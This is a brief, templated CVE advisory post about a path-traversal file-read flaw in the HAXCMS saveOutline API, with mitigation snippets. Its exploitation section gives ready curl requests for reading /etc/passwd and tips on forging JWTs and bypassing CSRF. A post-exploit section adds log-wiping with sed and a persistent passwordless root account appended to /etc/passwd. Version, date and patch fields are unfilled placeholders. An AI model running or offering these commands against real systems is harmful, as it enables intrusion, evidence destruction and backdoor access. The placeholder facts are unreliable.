Listen to this Post
How the CVE Works
The vulnerability occurs in HAXCMS when processing the `location` field in the `saveOutline` API endpoint. An authenticated attacker can manipulate this field to inject path traversal sequences (e.g., ../../../etc/passwd
). The CMS fails to sanitize this input before writing it to site.json
. Later, when the CMS loads the outline data, it resolves the malicious path, leading to arbitrary file read. Since the web server (www-data
) typically has read access to system files, attackers can exfiltrate sensitive data.
DailyCVE Form
Platform: HAXCMS
Version: <vX.X.X
Vulnerability: LFI
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q3 2023
What Undercode Say:
Exploitation:
- Auth Bypass: If JWT is weak, brute-force or forge tokens.
- CSRF Bypass: Use `fetch()` with `credentials: include` to bypass CSRF.
3. Payload Crafting:
curl -X POST 'https://target/system/api/saveOutline' \ -H 'Authorization: Bearer JWT' \ -H 'X-CSRF-Token: XXX' \ -d '{"location":"../../../etc/passwd"}'
4. Exfiltration:
curl 'https://target/?load=../../../../etc/passwd' | grep root
Mitigation:
1. Input Sanitization:
$location = realpath(trim($_POST['location'])); if (strpos($location, BASE_DIR) !== 0) { die("Invalid path"); }
2. Web Server:
location ~ .json$ { deny all; }
3. PHP Hardening:
open_basedir = /var/www/html
4. WAF Rules:
modsecurity_rules 'SecRule ARGS "@contains ../" "id:1000,deny"'
Detection:
grep -r "saveOutline" /var/www/haxcms --include=".php"
Post-Exploit:
1. Log Cleaning:
sed -i '/passwd/d' /var/log/apache2/access.log
2. Persistence:
echo 'malicious::0:0::/:/bin/bash' >> /etc/passwd
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode